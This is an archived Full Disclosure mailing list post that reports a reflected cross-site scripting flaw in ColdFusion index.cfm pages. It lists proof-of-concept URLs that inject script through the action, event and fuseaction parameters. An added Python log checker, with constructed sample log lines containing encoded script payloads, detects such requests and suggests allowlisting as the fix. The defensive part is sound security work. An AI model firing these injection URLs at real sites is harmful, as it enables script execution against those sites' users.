Full Disclosure mailing list archives
New Problem in Index.cfm
From: saied hackeriran <saiedhackeriran () yahoo com>
Date: Wed, 19 Jul 2006 06:12:49 -0700 (PDT)
In The Name Of God

Discoverer: SaiedHacker
Group: HackeranShiraz
Critical Level: Dangerous

This matter happens in index.cfm when we want to run some specific functions such as action, event, ..., and a hacker can start attacks such as an XSS attack by using simple script or HTML code.

Exploit:
Http://www.Site.com/path/index.cfm?action=<script>
Http://www.Site.com/path/index.cfm?event=<script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>

XSS:
Http://www.Site.com/path/index.cfm?action=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?event=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>alert("SaiedHacker");</script>

Have fun
SaiedHackerIran () yahoo com
www.SaiedHackerPro.PersianBlog.com

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
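
Added example, not part of the original post: a log check that flags requests to index.cfm whose action, event or fuseaction value is anything other than a plain identifier, including percent-encoded and double-encoded markup. The allowlist pattern, the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Dispatcher parameters named in the post.
WATCHED = {"action", "event", "fuseaction"}
# Assumption: legitimate values are plain identifiers such as "home.main".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.\-]{1,64}")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %253Cscript%253E is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for watched parameters whose value
    falls outside the allowlist; [] when the line is clean or unrelated."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("index.cfm"):
        return []
    hits = []
    for name, raw in parse_qsl(parts.query):  # decodes one layer
        if name.lower() in WATCHED:
            value = fully_decode(raw)
            if not SAFE_VALUE.fullmatch(value):
                hits.append((name.lower(), value))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jul/2006:13:12:49 +0000] '
    '"GET /path/index.cfm?fuseaction=home.main HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Jul/2006:13:13:02 +0000] '
    '"GET /path/index.cfm?action=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5177',
    '203.0.113.9 - - [19/Jul/2006:13:13:05 +0000] '
    '"GET /path/index.cfm?event=%253Cscript%253E HTTP/1.1" 200 5133',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```

The same allowlist, applied in the application before the parameter is dispatched or echoed, together with HTML-encoding on output, is the corresponding server-side fix.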
Current thread:
- New Problem in Index.cfm saied hackeriran (Jul 19)
- Re: New Problem in Index.cfm Valdis . Kletnieks (Jul 19)